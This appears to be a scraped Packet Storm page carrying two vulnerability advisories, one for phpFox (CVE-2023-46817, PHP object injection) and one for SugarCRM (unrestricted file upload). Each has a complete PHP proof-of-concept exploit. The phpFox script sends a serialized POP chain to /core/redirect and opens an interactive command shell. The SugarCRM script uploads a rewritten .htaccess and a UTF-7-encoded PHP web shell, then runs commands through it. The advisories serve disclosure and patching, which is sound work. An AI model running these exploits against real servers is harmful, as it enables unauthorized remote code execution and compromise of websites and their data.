/>[09/10/2023] - Vulnerability details shared with the vendor, stating the <br />issue is quite critical<br />[17/10/2023] - Vendor contacted again, asking for an update<br />[18/10/2023] - Vendor response stating "this issue is fixed in our <br />latest version (4.8.13)", but that's not the truth<br />[26/10/2023] - Version 4.8.14 released<br />[27/10/2023] - CVE identifier assigned<br />[27/10/2023] - Public disclosure<br /><br /><br />[-] CVE Reference:<br /><br />The Common Vulnerabilities and Exposures project (cve.mitre.org)<br />has assigned the name CVE-2023-46817 to this vulnerability.<br /><br /><br />[-] Credits:<br /><br />Vulnerability discovered by Egidio Romano.<br /><br /><br />[-] Original Advisory:<br /><br />https://karmainsecurity.com/KIS-2023-12<br /><br /><br />[-] Other References:<br /><br />https://docs.phpfox.com/display/FOX4MAN/phpFox+4.8.14<br /><br /><br />--- CVE-2023-46817.php poc ---<br /><br /><?php<br /><br />/*<br /> --------------------------------------------------------------<br /> phpFox <= 4.8.13 (redirect) PHP Object Injection Vulnerability<br /> --------------------------------------------------------------<br /><br /> author..............: Egidio Romano aka EgiX<br /> mail................: n0b0d13s[at]gmail[dot]com<br /> software link.......: https://www.phpfox.com<br /><br /> +-------------------------------------------------------------------------+<br /> | This proof of concept code was written for educational purpose only. |<br /> | Use it at your own risk. Author will be not responsible for any damage. |<br /> +-------------------------------------------------------------------------+<br /><br /> [-] Vulnerability Description:<br /><br /> User input passed through the "url" request parameter to the /core/redirect route is<br /> not properly sanitized before being used in a call to the unserialize() PHP function.<br /> This can be exploited by remote, unauthenticated attackers to inject arbitrary PHP<br /> objects into the application scope, allowing them to perform a variety of attacks,<br /> such as executing arbitrary PHP code.<br /><br /> [-] Original Advisory:<br /><br /> https://karmainsecurity.com/KIS-2023-12<br />*/<br /><br />set_time_limit(0);<br />error_reporting(E_ERROR);<br /><br />if (!extension_loaded("curl")) die("[+] cURL extension required!\n");<br /><br />print "+------------------------------------------------------------------+\n";<br />print "| phpFox <= 4.8.13 (redirect) PHP Object Injection Exploit by EgiX |\n";<br />print "+------------------------------------------------------------------+\n";<br /><br />if ($argc != 2) die("\nUsage: php $argv[0] <URL>\n\n");<br /><br />function encode($string)<br />{<br /> $string = addslashes(gzcompress($string, 9));<br /> return urlencode(strtr(base64_encode($string), '+/=', '-_,'));<br />}<br /><br />class Phpfox_Request<br />{<br /> private $_sName = "EgiX";<br /> private $_sPluginRequestGet = "print '_____'; passthru(base64_decode(\$_SERVER['HTTP_CMD'])); print '_____'; die;";<br />}<br /><br />class Core_Objectify<br />{<br /> private $__toString;<br /><br /> function __construct($callback)<br /> {<br /> $this->__toString = $callback;<br /> }<br />}<br /><br />print "\n[+] Launching shell on {$argv[1]}\n";<br /><br />$popChain = serialize(new Core_Objectify([new Phpfox_Request, "get"]));<br />$popChain = str_replace('Core_Objectify', 'Core\Objectify', $popChain);<br /><br />$ch = curl_init();<br /><br />curl_setopt($ch, CURLOPT_URL, "{$argv[1]}index.php/core/redirect");<br />curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);<br />curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);<br />curl_setopt($ch, CURLOPT_POSTFIELDS, "url=".encode($popChain));<br /><br />while(1)<br />{<br /> print "\nphpFox-shell# ";<br /> if (($cmd = trim(fgets(STDIN))) == "exit") break;<br /> curl_setopt($ch, CURLOPT_HTTPHEADER, ["CMD: ".base64_encode($cmd)]);<br /> preg_match("/_____(.*)_____/s", curl_exec($ch), $m) ? print $m[1] : die("\n[+] Exploit failed!\n");<br />}<br /><br /></code></pre>
<pre><code>-------------------------------------------------------------------------------<br />SugarCRM <= 13.0.1 (set_note_attachment) Unrestricted File Upload <br />Vulnerability<br />-------------------------------------------------------------------------------<br /><br /><br />[-] Software Link:<br /><br />https://www.sugarcrm.com<br /><br /><br />[-] Affected Versions:<br /><br />Version 13.0.1 and prior versions.<br />Version 12.0.3 and prior versions.<br /><br /><br />[-] Vulnerability Description:<br /><br />When handling the "set_note_attachment" SOAP call, the application <br />allows uploading of<br />any kind of file into /upload/ directory. This one is protected by the <br />main SugarCRM<br />.htaccess file, i.e. it doesn't allow access/execution of PHP files. <br />However, this<br />behavior can be overridden if the subdirectory contains another <br />.htaccess file.<br />So, an attacker can leverage the vulnerability to firstly upload a new <br />.htaccess<br />file and then to upload the PHP code they want to execute.<br /><br /><br />[-] Proof of Concept:<br /><br />https://karmainsecurity.com/pocs/KIS-2023-11.php<br /><br />(Packet Storm note: POC included at bottom)<br /><br />[-] Solution:<br /><br />Upgrade to version 13.0.2, 12.0.4, or later.<br /><br /><br />[-] Disclosure Timeline:<br /><br />[23/04/2023] - Vendor notified<br />[21/09/2023] - Fixed versions released<br />[06/10/2023] - CVE identifier requested<br />[26/10/2023] - Publication of this advisory<br /><br /><br />[-] CVE Reference:<br /><br />The Common Vulnerabilities and Exposures project (cve.mitre.org)<br />has not assigned a CVE identifier for this vulnerability.<br /><br /><br />[-] Credits:<br /><br />Vulnerability discovered by Egidio Romano.<br /><br /><br />[-] Original Advisory:<br /><br />https://karmainsecurity.com/KIS-2023-11<br /><br /><br />[-] Other References:<br /><br />https://support.sugarcrm.com/resources/security/sugarcrm-sa-2023-011/<br /><br /><br />--- KIS-2023-11.php poc ---<br /><br /><br /><?php<br /><br />set_time_limit(0);<br />error_reporting(E_ERROR);<br /><br />if (!extension_loaded("curl")) die("[+] cURL extension required!\n");<br /><br />if ($argc != 4) die("Usage: php $argv[0] <URL> <username> <password>\n");<br /><br />list($url, $user, $pass) = [$argv[1], $argv[2], $argv[3]];<br /><br />print "[+] Logging in with username '{$user}' and password '{$pass}'\n";<br /><br />$ch = curl_init();<br /><br />$params = ["username" => $user, "password" => $pass, "grant_type" => "password", "client_id" => "sugar"];<br /><br />curl_setopt($ch, CURLOPT_URL, "{$url}rest/v10/oauth2/token");<br />curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode($params));<br />curl_setopt($ch, CURLOPT_HTTPHEADER, ["Content-Type: application/json"]);<br />curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);<br />curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);<br /><br />if (($token = (json_decode(curl_exec($ch)))->access_token) == null) die("[+] Login failed!\n");<br /><br />print "[+] Creating new Notes bean (ID: .htaccess)\n";<br /><br />$note_id = ".htaccess";<br /><br />curl_setopt($ch, CURLOPT_URL, "{$url}rest/v10/Notes");<br />curl_setopt($ch, CURLOPT_HTTPHEADER, ["Content-Type: application/json", "OAuth-Token: {$token}"]);<br />curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode(["id" => $note_id]));<br /><br />if (!preg_match("/$note_id/", curl_exec($ch))) die("[+] Bean creation failed!\n");<br /><br />print "[+] Creating new Notes bean (ID: sh.php)\n";<br /><br />$note_id = "sh.php";<br /><br />curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode(["id" => $note_id]));<br /><br />if (!preg_match("/$note_id/", curl_exec($ch))) die("[+] Bean creation failed!\n");<br /><br />require_once("./lib/nusoap.php");<br />$client = new nusoap_client("{$url}soap.php", false);<br /><br />if (($err = $client->getError()))<br />{<br /> echo "\nConstructor error: $err";<br /> echo "\nDebug: " . $client->getDebug() . "\n";<br /> die();<br />}<br /><br />print "[+] Sending SOAP login request\n";<br /><br />$params = ["user_auth" => ["user_name" => $user, "password" => $pass]];<br />$session = $client->call('login', $params);<br /><br />if ($session['id'] == -1) die("[+] SOAP login failed!\n");<br /><br />print "[+] Uploading .htaccess through 'set_note_attachment'\n";<br /><br />$htaccess = "RewriteEngine on\nRewriteBase /upload\nRewriteRule ^(.*)$ - [L]\nphp_flag zend.multibyte 1\nphp_value zend.script_encoding \"UTF-7\"";<br />$params = ["session" => $session['id'], "note" => ["id" => ".htaccess", "file" => base64_encode($htaccess)]];<br /><br />$client->call("set_note_attachment", $params);<br /><br />print "[+] Uploading shell through 'set_note_attachment'\n";<br /><br />$shell = "+ADw?php passthru(\$_SERVER['HTTP_CMD']); ?>";<br />$params = ["session" => $session['id'], "note" => ["id" => "sh.php", "file" => base64_encode($shell)]];<br /><br />$client->call("set_note_attachment", $params);<br /><br />print "[+] Launching shell\n";<br /><br />curl_setopt($ch, CURLOPT_URL, "{$url}upload/sh.php");<br /><br />while(1)<br />{<br /> print "\nsugar-shell# ";<br /> if (($cmd = trim(fgets(STDIN))) == "exit") break;<br /> curl_setopt($ch, CURLOPT_HTTPHEADER, ["CMD: ".$cmd]);<br /> ($r = curl_exec($ch)) ? print $r : die("\n[+] Exploit failed!\n");<br />}<br /><br /><br /></code></pre>